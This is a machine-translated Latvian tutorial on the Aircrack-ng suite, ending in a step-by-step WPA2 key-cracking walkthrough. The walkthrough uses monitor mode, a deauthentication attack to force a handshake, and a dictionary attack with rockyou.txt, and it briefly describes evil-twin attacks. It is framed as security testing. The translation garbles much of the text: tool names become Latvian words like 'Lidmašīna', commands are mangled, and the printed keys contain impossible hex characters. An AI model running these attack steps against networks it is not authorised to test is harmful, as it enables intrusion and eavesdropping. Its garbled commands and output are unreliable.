Kā lietot Aircrack-ng

How Use Aircrack Ng



Lielāko daļu laika cilvēki nekad nedomā par tīklu, kuram viņi ir pievienoti. Viņi nekad nedomā, cik drošs ir šis tīkls un cik daudz viņi ikdienā riskē ar saviem konfidenciālajiem datiem. Izmantojot wifi tīklus, varat veikt ievainojamības pārbaudes, izmantojot ļoti spēcīgu rīku Lidmašīna un Wireshark. Wireshark tiek izmantots, lai uzraudzītu tīkla darbību. Lidmašīna ir vairāk kā agresīvs rīks, kas ļauj uzlauzt un piešķirt piekļuvi bezvadu savienojumiem. Domāšana par iebrucēju vienmēr ir bijusi drošākais veids, kā pasargāt sevi no uzlaušanas. Jūs, iespējams, varēsit saprast precīzas darbības, ko iebrucējs veiks, lai piekļūtu jūsu sistēmai, uzzinot par lidmašīnu. Pēc tam jūs varat veikt atbilstības pārbaudes savā sistēmā, lai pārliecinātos, ka tā nav nedroša.

Lidmašīna ir pilns programmatūras komplekts, kas paredzēts WiFi tīkla drošības pārbaudei. Tas nav tikai viens rīks, bet gan rīku kopums, no kuriem katrs veic noteiktu mērķi. Var strādāt ar dažādām wifi drošības jomām, piemēram, piekļuves punkta uzraudzību, testēšanu, uzbrukumu tīklam, wifi tīkla uzlaušanu un tā pārbaudi. Aircrack galvenais mērķis ir pārtvert paketes un atšifrēt jauktās paroles. Tas atbalsta gandrīz visas jaunās bezvadu saskarnes. Lidmašīna ir novecojusi rīku komplekta Aircrack uzlabota versija, ng attiecas uz Jauna paaudze . Daži no brīnišķīgajiem rīkiem, kas darbojas kopā, veicot lielāku uzdevumu.







Airmon:

Airmon-ng ir iekļauts aircrack-ng komplektā, kas tīkla saskarnes karti ievieto monitora režīmā. Tīkla kartes parasti pieņem tikai tām paredzētas paketes, kā noteikts NIC MAC adresē, taču, izmantojot airmon-ng, tiks pieņemtas arī visas bezvadu paketes, neatkarīgi no tā, vai tās ir paredzētas viņiem vai nē. Jums vajadzētu būt iespējai noķert šīs paketes, nesaistot vai autentificējot piekļuves punktu. To izmanto, lai pārbaudītu piekļuves punkta statusu, ievietojot tīkla interfeisu monitora režīmā. Pirmkārt, ir jākonfigurē bezvadu kartes, lai ieslēgtu monitora režīmu, pēc tam nogaliniet visus fona procesus, ja domājat, ka kāds process to traucē. Pēc procesu pārtraukšanas monitora režīmu var iespējot bezvadu saskarnē, izpildot tālāk norādīto komandu.



[aizsargāts ar e -pastu]: ~ $sudoairmon-ng start wlan0#

Varat arī atspējot monitora režīmu, jebkurā brīdī apturot airmon-ng, izmantojot tālāk norādīto komandu.

[aizsargāts ar e -pastu]: ~ $sudoairmon-ng stop wlan0#

Gaisa nosūcējs:

Airodump-ng tiek izmantots, lai uzskaitītu visus apkārtējos tīklus un apskatītu vērtīgu informāciju par tiem. Airodump-ng pamatfunkcija ir iepakot paketes, tāpēc tā būtībā ir ieprogrammēta, lai pārņemtu visas mums apkārt esošās paketes, kamēr tās tiek novietotas monitora režīmā. Mēs to izmantosim pret visiem apkārt esošajiem savienojumiem un apkoposim datus, piemēram, tīklam pievienoto klientu skaitu, to atbilstošās mac adreses, šifrēšanas stilu un kanālu nosaukumus, un pēc tam sāksim mērķauditorijas atlasi mūsu mērķa tīklā.

Ierakstot komandu airodump-ng un piešķirot tam tīkla interfeisa nosaukumu kā parametru, mēs varam aktivizēt šo rīku. Tajā tiks uzskaitīti visi piekļuves punkti, datu pakešu daudzums, izmantotās šifrēšanas un autentifikācijas metodes un tīkla nosaukums (ESSID). No uzlaušanas viedokļa Mac adreses ir vissvarīgākie lauki.

[aizsargāts ar e -pastu]: ~ $sudoairodump-ng wlx0mon

Lidmašīna:

Aircrack tiek izmantots paroļu uzlaušanai. Pēc visu pakešu uztveršanas, izmantojot airodump, mēs varam uzlauzt atslēgu ar lidmašīnu. Tas uzlauž šīs atslēgas, izmantojot divas metodes PTW un FMS. PTW pieeja tiek veikta divos posmos. Sākumā tiek izmantotas tikai ARP paketes, un tikai tad, ja pēc meklēšanas atslēga nav sašķelta, tā izmanto visas pārējās uztvertās paketes. PTW pieejas plus ir tas, ka ne visas paketes tiek izmantotas plaisāšanai. Otrajā pieejā, t.i., FMS, atslēgas uzlaušanai mēs izmantojam gan statistiskos modeļus, gan brutālā spēka algos. Var izmantot arī vārdnīcas metodi.

Aireplay:

Airplay-ng ievieš paketes bezvadu tīklā, lai izveidotu vai paātrinātu trafiku. Aireplay-ng var uztvert paketes no diviem dažādiem avotiem. Pirmais ir tiešais tīkls, bet otrais ir paketes no jau esošā pcap faila. Airplay-ng ir noderīgs deautentifikācijas uzbrukuma laikā, kura mērķis ir bezvadu piekļuves punkts un lietotājs. Turklāt jūs varat veikt dažus uzbrukumus, piemēram, kafijas latte uzbrukumu, izmantojot airplay-ng-rīku, kas ļauj iegūt atslēgu no klienta sistēmas. To var panākt, noķerot ARP paketi un pēc tam manipulējot ar to un nosūtot to atpakaļ sistēmai. Pēc tam klients izveidos paketi, kuru var uzņemt ar airodump, un aircrack uzlauž šīs modificētās paketes atslēgu. Dažas citas airplay-ng uzbrukuma iespējas ir choppop, fragments arepreplay utt.

Gaisa bāze:

Airbase-ng tiek izmantots, lai pārveidotu iebrucēja datoru par apdraudētu savienojuma punktu, lai citi varētu izveidot saiti. Izmantojot Airbase-ng, jūs varat apgalvot, ka esat likumīgs piekļuves punkts, un veikt uzbrukumus starp cilvēkiem, kas ir pievienoti jūsu tīklam. Šāda veida uzbrukumus sauc par ļaunajiem dvīņu uzbrukumiem. Pamatlietotājiem nav iespējams atšķirt legālu piekļuves punktu un viltus piekļuves punktu. Tātad ļaunie dvīņu draudi ir vieni no visdraudīgākajiem bezvadu draudiem, ar kuriem mēs šodien saskaramies.

Airolib-ng:

Airolib paātrina uzlaušanas procesu, saglabājot un pārvaldot paroļu sarakstus un piekļuves punktu. Šīs programmas izmantotā datu bāzes pārvaldības sistēma ir SQLite3, kas lielākoties ir pieejama visās platformās. Paroles uzlaušana ietver pāra galvenās atslēgas aprēķinu, caur kuru tiek iegūta privātā pārejas atslēga (PTK). Izmantojot PTK, jūs varat noteikt kadra ziņojuma identifikācijas kodu (MIC) konkrētai paketei un teorētiski atrast, ka MIC ir līdzīgs pakotnei, tādēļ, ja PTK bija taisnība, arī PMK bija taisnība.

Lai skatītu datu bāzē saglabātos paroļu sarakstus un piekļuves tīklus, ierakstiet šādu komandu:

[aizsargāts ar e -pastu]: ~ $sudoairolib-ng testdatabase-statistika

Šeit testa datu bāze ir db, kurai vēlaties piekļūt vai kuru izveidot, un –stats ir darbība, kuru vēlaties tajā veikt. Datu bāzes laukos varat veikt vairākas darbības, piemēram, piešķirt maksimālu prioritāti kādam SSID vai tamlīdzīgi. Lai izmantotu airolib-ng ar aircrack-ng, ievadiet šādu komandu:

[aizsargāts ar e -pastu]: ~ $sudolidmašīnas plaisa-rtestdatabase wpa2.eapol.cap

Šeit mēs izmantojam jau aprēķinātos PMK, kas saglabāti testa datu bāze lai paātrinātu paroļu uzlaušanas procesu.

WPA/WPA2 plaisāšana, izmantojot Aircrack-ng:

Apskatīsim nelielu piemēru tam, ko aircrack-ng var paveikt, izmantojot dažus lieliskus rīkus. Mēs uzlaužam WPA/WPA2 tīkla iepriekš koplietoto atslēgu, izmantojot vārdnīcas metodi.

Pirmā lieta, kas mums jādara, ir uzskaitīt tīkla saskarnes, kas atbalsta monitora režīmu. To var izdarīt, izmantojot šādu komandu:

[aizsargāts ar e -pastu]: ~ $sudoairmon-ng

PHY interfeisa draivera mikroshēmojums

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Mēs varam redzēt saskarni; tagad mums ir jānovieto atrastā tīkla saskarne (wlx0) monitora režīmā, izmantojot šādu komandu:

[aizsargāts ar e -pastu]: ~ $sudoairmon-ng start wlx0

Tas ir iespējojis monitora režīmu saskarnē ar nosaukumu wlx0mon .

Tagad mums jāsāk klausīties blakus esošo maršrutētāju pārraides, izmantojot mūsu tīkla saskarni, kuru esam ievietojuši monitora režīmā.

[aizsargāts ar e -pastu]: ~ $sudoairodump-ng wlx0mon

CH5 ][Pagājis:30s][ 2020-12-02 00:17



BSSID PWR bākas#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Četri, pieci 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10: BE-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: DOD:88: FA:38: 02-68 28 2 0 vienpadsmit54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C: 3A:Četri, pieci: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e-6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

Mūsu mērķa tīkls ir Crackit šajā gadījumā, kas pašlaik darbojas 1. kanālā.

Šeit, lai uzlauztu mērķa tīkla paroli, mums ir jāuztver četrvirzienu rokasspiediens, kas notiek, kad ierīce mēģina izveidot savienojumu ar tīklu. Mēs varam to uzņemt, izmantojot šādu komandu:

[aizsargāts ar e -pastu]: ~ $sudogaisa nosūcējs-c 1--bssid E4: 6F:13: 04: CE:31 -iekšā /mājas wlx0

-c : Kanāls

- Bss : Bssid no mērķa tīkla

-iekšā : Tās direktorijas nosaukums, kurā tiks ievietots pcap fails

Tagad mums jāgaida, kamēr ierīce izveidos savienojumu ar tīklu, taču ir labāks veids, kā uzņemt rokasspiedienu. Mēs varam deautentificēt ierīces AP, izmantojot deautentifikācijas uzbrukumu, izmantojot šādu komandu:

[aizsargāts ar e -pastu]: ~ $sudoaireplay-ng-0 -uzE4: 6F:13: 04: CE:31

uz : Bssid no mērķa tīkla

-0 : deautentifikācijas uzbrukums

Mēs esam atvienojuši visas ierīces, un tagad mums jāgaida, līdz ierīce izveidos savienojumu ar tīklu.

CH1 ][Pagājis:30s][ 2020-12-02 00:02][WPA rokasspiediens: E4: 6F:13: 04: CE:31



BSSID PWR RXQ bākas#Dati, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Četri, pieci: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Mēs saņēmām trāpījumu, un, aplūkojot augšējo labo stūri tieši blakus laikam, mēs redzam, ka ir notverts rokasspiediens. Tagad skatieties norādītajā mapē ( /mājas mūsu gadījumā) a .pcap failu.

Lai uzlauztu WPA atslēgu, mēs varam izmantot šādu komandu:

[aizsargāts ar e -pastu]: ~ $sudolidmašīnas plaisa-2 -iekšārockyou.txt-bE4: 6F:13: 04: CE:31rokasspiediens.vāciņš

b: mērķa tīkla Bssid

-a2: WPA2 režīms

Rockyou.txt: vārdnīcafailulietotas

Handshake.cap:failu kurusatur notvertu rokasspiedienu

Lidmašīna1.2beta3

[00:01:49] 10566pārbaudītas atslēgas(1017.96uz/s)

ATSLĒGTS! [tu mani pieķēri]

Galvenā atslēga: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpiecdesmitC


Pārejoša atslēga: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FpiecdesmitC025 62E9 5D71

Mūsu mērķa tīkla atslēga ir veiksmīgi uzlauzta.

Secinājums:

Bezvadu tīkli ir visur, un tos izmanto ikviens uzņēmums, sākot no darbiniekiem, kuri izmanto viedtālruņus, līdz rūpnieciskām vadības ierīcēm. Saskaņā ar pētījumiem 2021. gadā gandrīz vairāk nekā 50 procenti no interneta trafika pārsniegs WiFi. Bezvadu tīkliem ir daudz priekšrocību, komunikācija ārpus durvīm, ātra piekļuve internetam vietās, kur ir gandrīz neiespējami novietot vadus, var paplašināt tīklu, neinstalējot kabeļus. jebkuram citam lietotājam un var viegli savienot jūsu mobilās ierīces ar mājas birojiem, kamēr neesat tur.

Neskatoties uz šīm priekšrocībām, ir liela jautājuma zīme par jūsu privātumu un drošību. Tā kā šie tīkli; pārraides diapazonā maršrutētāji ir pieejami ikvienam, tiem var viegli uzbrukt un jūsu dati var tikt viegli apdraudēti. Piemēram, ja esat izveidojis savienojumu ar kādu publisku Wi -Fi, ikviens, kas ir pievienojies šim tīklam, var viegli pārbaudīt jūsu tīkla trafiku, izmantojot kādu izlūkošanas informāciju un izmantojot lieliskus pieejamos rīkus, un pat izmest to.